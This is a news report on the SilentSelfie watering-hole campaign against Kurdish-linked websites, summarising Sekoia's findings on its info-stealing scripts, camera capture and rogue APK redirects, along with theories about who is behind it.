[Source – thehackernews.com]
Over the past year and a half, 25 websites connected to the Kurdish minority have been targeted in a sophisticated cyberattack aimed at harvesting sensitive user information. Dubbed “SilentSelfie Cyberattack,” this campaign has been traced back to December 2022 and is being described as a long-term watering hole attack. The details of this breach, which continues to affect several websites, were disclosed by French cybersecurity firm Sekoia, which has been closely monitoring the campaign.
The SilentSelfie Campaign: Long-Running and Sophisticated
Sekoia revealed that the SilentSelfie Cyberattack primarily targets websites associated with Kurdish press, media, and political organizations, including entities like the Rojava administration and its armed forces, as well as revolutionary far-left political parties in Türkiye and Kurdish regions. The hackers behind the attack compromised these websites with the intention of installing malicious software that collects sensitive data. The attack involves deploying four different variants of an information-stealing framework, ranging from simple scripts that record a user’s location to more complex malware that activates a device’s selfie camera or tricks users into downloading a malicious Android application (APK).
However, the method used to initially breach these websites remains unclear. Sekoia’s researchers, Felix Aimé and Maxime A, noted that the precise technique used to compromise the sites has not been identified, but it is clear that the attackers are gathering a significant amount of user data, including location, device information, and public IP addresses. One of the more alarming aspects of the attack is its ability to record images from device cameras and redirect users to harmful APK files.
Targeted Kurdish Websites and the Unknown Threat Actor
The scope of the SilentSelfie Cyberattack has drawn attention due to its long duration and the number of affected websites. In addition to targeting Kurdish websites, it bears resemblance to other cyberattacks carried out by groups like StrongPity and BladeHawk, which have also previously targeted the Kurdish community. Earlier in 2023, Dutch security firm Hunt & Hackett reported that Kurdish websites in the Netherlands had been similarly targeted by a Türkiye-linked group known as Sea Turtle. These coordinated attacks appear to form part of a larger pattern of cyber surveillance targeting Kurdish entities.
SilentSelfie, however, has yet to be linked to a known threat actor. Sekoia suggests the possibility that a newly emerging group, perhaps with limited experience or resources, could be behind the attacks. This theory is based on the campaign’s relatively low sophistication and the lack of persistence mechanisms in the deployed malware. Despite this, the attack remains effective due to the sheer number of websites it has compromised.
Uncertainty Surrounding the Origins of SilentSelfie
Although SilentSelfie lacks the hallmarks of more sophisticated campaigns, it remains notable due to its persistence and scale. Some experts believe that the Kurdistan Regional Government of Iraq may be involved, citing the arrest of RojNews journalist Silêman Ehmed in 2023 by KDP forces. Ehmed was later sentenced to three years in prison in 2024, and his arrest has raised questions about possible links between the cyberattack and political motivations.
Sekoia’s analysis also found that one variant of the malicious script redirects users to rogue APK files on several websites, including rojnews[.]news and hawarnews[.]com. Once installed, these APKs collect sensitive data like location, contact lists, and files stored on the user’s device. Despite the attack’s limited sophistication, its long-term presence and potential for mass data harvesting have caused significant concern among cybersecurity experts.
In conclusion, while the full extent of the SilentSelfie Cyberattack’s impact and the identity of its perpetrators remain uncertain, this campaign highlights the ongoing vulnerability of Kurdish-related websites to cyber threats. As the situation develops, further investigations may shed more light on the motivations and actors behind this prolonged attack campaign.
